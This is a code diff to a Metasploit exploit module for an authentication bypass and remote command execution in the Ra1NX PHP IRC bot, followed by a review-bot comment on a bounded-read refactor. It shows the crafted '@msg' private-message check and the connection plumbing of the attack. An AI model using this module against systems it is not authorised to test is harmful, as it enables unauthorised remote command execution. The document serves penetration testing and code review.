Merge branch 'Ra1NX_pubcall' of https://github.com/bwall/metasploit-framework into Ra1NX_pubcall
commit
21ea1c9ed4
|
@ -14,7 +14,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
|
||||||
def initialize(info = {})
|
def initialize(info = {})
|
||||||
super(update_info(info,
|
super(update_info(info,
|
||||||
'Name' => '"Ra1NX" PHP Bot PubCall Authentication Bypass Remote Code Execution',
|
'Name' => 'Ra1NX PHP Bot PubCall Authentication Bypass Remote Code Execution',
|
||||||
'Description' => %q{
|
'Description' => %q{
|
||||||
This module allows remote command execution on the PHP IRC bot Ra1NX by
|
This module allows remote command execution on the PHP IRC bot Ra1NX by
|
||||||
using the public call feature in private message to covertly bypass the
|
using the public call feature in private message to covertly bypass the
|
||||||
|
@ -27,6 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
|
['OSVDB', '91663'],
|
||||||
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
|
['URL', 'https://defense.ballastsecurity.net/wiki/index.php/Ra1NX_bot'],
|
||||||
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
|
['URL', 'https://defense.ballastsecurity.net/decoding/index.php?hash=69401ac90262f3855c23cd143d7d2ae0'],
|
||||||
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
|
['URL', 'http://ddecode.com/phpdecoder/?results=8c6ba611ea2a504da928c6e176a6537b']
|
||||||
|
@ -40,7 +41,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
'DisableNops' => true,
|
'DisableNops' => true,
|
||||||
'Compat' =>
|
'Compat' =>
|
||||||
{
|
{
|
||||||
'PayloadType' => 'cmd',
|
'PayloadType' => 'cmd'
|
||||||
}
|
}
|
||||||
},
|
},
|
||||||
'Targets' =>
|
'Targets' =>
|
||||||
|
@ -62,16 +63,38 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def check
|
def connect_irc
|
||||||
|
print_status("#{rhost}:#{rport} - Connecting to IRC server...")
|
||||||
connect
|
connect
|
||||||
|
|
||||||
|
data = ""
|
||||||
|
begin
|
||||||
|
read_data = sock.get_once(-1, 1)
|
||||||
|
while not read_data.nil?
|
||||||
|
data << read_data
|
||||||
|
read_data = sock.get_once(-1, 1)
|
||||||
|
end
|
||||||
|
rescue EOFError
|
||||||
|
end
|
||||||
|
|
||||||
|
if data and data =~ /020.*wait/
|
||||||
|
print_status("#{rhost}:#{rport} - Connection successful, giving 3 seconds to IRC server to process our connection...")
|
||||||
|
select(nil, nil, nil, 3)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
def check
|
||||||
|
connect_irc
|
||||||
|
|
||||||
response = register(sock)
|
response = register(sock)
|
||||||
if response =~ /463/ or response =~ /464/
|
if response =~ /463/ or response =~ /464/
|
||||||
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
|
print_error("#{rhost}:#{rport} - Connection to the IRC Server not allowed")
|
||||||
return Exploit::CheckCode::Unknown
|
return Exploit::CheckCode::Unknown
|
||||||
end
|
end
|
||||||
|
|
||||||
confirm_string = rand_text_alpha(8)
|
confirm_string = rand_text_alpha(8)
|
||||||
response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n", ":#{datastore['RNICK']}")
|
response = send_msg(sock, "PRIVMSG #{datastore['RNICK']} :#{datastore['RNICK']} @msg #{datastore['NICK']} #{confirm_string}\r\n")
|
||||||
|
|
||||||
quit(sock)
|
quit(sock)
|
||||||
disconnect
|
disconnect
|
||||||
|
|
||||||
|
@ -82,22 +105,15 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
end
|
end
|
||||||
|
|
||||||
def send_msg(sock, data, startResponse = nil)
|
def send_msg(sock, data)
|
||||||
sock.put(data)
|
sock.put(data)
|
||||||
data = ""
|
data = ""
|
||||||
count = 3
|
|
||||||
begin
|
|
||||||
begin
|
begin
|
||||||
read_data = sock.get_once(-1, 1)
|
read_data = sock.get_once(-1, 1)
|
||||||
while not read_data.nil?
|
while not read_data.nil?
|
||||||
data << read_data
|
data << read_data
|
||||||
read_data = sock.get_once(-1, 1)
|
read_data = sock.get_once(-1, 1)
|
||||||
end
|
end
|
||||||
if startResponse != nil and data.start_with?(startResponse)
|
|
||||||
startResponse = nil
|
|
||||||
end
|
|
||||||
count -= 1
|
|
||||||
end while startResponse == nil and count != 0
|
|
||||||
rescue EOFError
|
rescue EOFError
|
||||||
end
|
end
|
||||||
data
|
data
|
||||||
|
@ -137,7 +153,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
||||||
end
|
end
|
||||||
|
|
||||||
def exploit
|
def exploit
|
||||||
connect
|
connect_irc
|
||||||
|
|
||||||
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
|
print_status("#{rhost}:#{rport} - Registering with the IRC Server...")
|
||||||
response = register(sock)
|
response = register(sock)
|
||||||
|
|
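Review bot: The read loop added in `connect_irc` has no upper bound and duplicates the loop that `send_msg` keeps after this change. It appends to `data` for as long as the server sends something within each one-second `get_once(-1, 1)` window, so a server that never goes quiet keeps the module reading and the buffer growing. The IRC server is not under the operator's control, so I would move the loop into one helper with a byte cap and call it from both methods, as sketched below. In the `020` test the `data and` guard is redundant because `data` is always a String there, and the empty `rescue EOFError` deserves a comment saying the close is expected. The end of `send_msg` lies outside the visible hunk.

```ruby
# Reads until the peer is quiet for one second, closes, or max_bytes is reached.
def read_pending(sock, max_bytes = 65536)
  data = ""
  begin
    while data.length < max_bytes and (chunk = sock.get_once(-1, 1))
      data << chunk
    end
  rescue EOFError
    # peer closed the connection; return what was read so far
  end
  data
end

def connect_irc
  # … unchanged: status message and connect …
  data = read_pending(sock)
  # … unchanged: 020 banner test and 3 second pause …
```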